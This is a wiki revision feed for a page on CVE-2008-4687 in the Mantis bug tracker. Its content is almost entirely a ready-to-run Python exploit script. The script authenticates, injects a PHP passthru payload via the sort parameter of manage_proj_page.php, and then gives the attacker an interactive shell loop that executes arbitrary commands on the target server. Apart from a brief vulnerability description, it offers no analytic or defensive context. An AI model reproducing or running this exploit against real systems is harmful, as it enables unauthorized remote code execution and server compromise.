<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2008-4687_Mantis%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2008-4687 Mantis任意代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2008-4687_Mantis%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2008-4687_Mantis%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T23:19:15Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2008-4687_Mantis%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=885&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Quick and dirty exploit for CVE-2008-4687. # Description by NIST: # manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to # execute...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2008-4687_Mantis%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=885&amp;oldid=prev"/>
		<updated>2021-04-02T03:15:11Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Quick and dirty exploit for CVE-2008-4687. # Description by NIST: # manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to # execute...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Quick and dirty exploit for CVE-2008-4687.&lt;br /&gt;
# Description by NIST:&lt;br /&gt;
# manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to&lt;br /&gt;
# execute arbitrary code via a sort parameter containing PHP sequences, which are p&lt;br /&gt;
# rocessed by create_function within the multi_sort function in core/utility_api.php.&lt;br /&gt;
# Author: Nelson Murilo&lt;br /&gt;
# Date: 2020/02/15&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import hashlib&lt;br /&gt;
import base64&lt;br /&gt;
import sys&lt;br /&gt;
&lt;br /&gt;
if len(sys.argv) != 5:&lt;br /&gt;
   print (&amp;quot;Usage: pymantis host path user pass&amp;quot;)&lt;br /&gt;
   exit(-1)&lt;br /&gt;
&lt;br /&gt;
host = sys.argv[1]&lt;br /&gt;
path = sys.argv[2]&lt;br /&gt;
user = sys.argv[3]&lt;br /&gt;
pwd = sys.argv[4]&lt;br /&gt;
&lt;br /&gt;
urlbase = &amp;quot;http://&amp;quot; + host&lt;br /&gt;
# just a little joke&lt;br /&gt;
ua = 'Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US'&lt;br /&gt;
p='PHPSESSID='+str(hashlib.md5('xploit'.encode()).hexdigest())&lt;br /&gt;
&lt;br /&gt;
d = { 'username':user , 'password': pwd }&lt;br /&gt;
r = requests.Session()&lt;br /&gt;
ret = r.get(urlbase + path + 'login_page.php')&lt;br /&gt;
&lt;br /&gt;
h = {&lt;br /&gt;
    'Host': host,&lt;br /&gt;
    'User-Agent': ua,&lt;br /&gt;
    'Cookie': p,&lt;br /&gt;
    'Connection': 'close'&lt;br /&gt;
}&lt;br /&gt;
ret = r.post(urlbase + path + 'login.php', data=d, headers=h)&lt;br /&gt;
try:&lt;br /&gt;
    cookies = p + &amp;quot;; ISSUES_STRING_COOKIE=&amp;quot; + r.cookies['ISSUES_STRING_COOKIE']&lt;br /&gt;
    print(&amp;quot;** Exploit works like a charm!&amp;quot;)&lt;br /&gt;
except:&lt;br /&gt;
    print(&amp;quot;Ops! Exploit fail - Bye&amp;quot;)&lt;br /&gt;
    quit()&lt;br /&gt;
#&lt;br /&gt;
# Poor man reverse shell&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
r.headers&lt;br /&gt;
{&lt;br /&gt;
    'Host': host,&lt;br /&gt;
    'Cookie': cookies,&lt;br /&gt;
    'Content-type': 'application/json; charset=utf-8',&lt;br /&gt;
    'Connection': 'close'&lt;br /&gt;
}&lt;br /&gt;
pow = &amp;quot;\']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23&amp;quot;&lt;br /&gt;
url = urlbase + path + 'manage_proj_page.php?sort=' + pow&lt;br /&gt;
&lt;br /&gt;
cmd = &amp;quot;&amp;quot;&lt;br /&gt;
while True:&lt;br /&gt;
    cmd = input(&amp;quot;www-data# &amp;quot;)&lt;br /&gt;
    if not cmd:&lt;br /&gt;
        continue&lt;br /&gt;
    if cmd.lower() in {'exit'}:&lt;br /&gt;
        break&lt;br /&gt;
    h = {&lt;br /&gt;
        'Host': host,&lt;br /&gt;
        'User-Agent': ua,&lt;br /&gt;
        'Cookie': cookies,&lt;br /&gt;
        'Cmd': base64.b64encode(cmd.encode('utf-8')).decode('utf-8'),&lt;br /&gt;
        'Connection': 'close'&lt;br /&gt;
    }&lt;br /&gt;
    ret = requests.get(url, headers=h)&lt;br /&gt;
    response = str(ret.content)&lt;br /&gt;
    for line in response.partition('_code_')[2].split(&amp;quot;\\n&amp;quot;):&lt;br /&gt;
        print(line.strip(&amp;quot;\'&amp;quot;))&lt;br /&gt;
print(&amp;quot;Bye&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>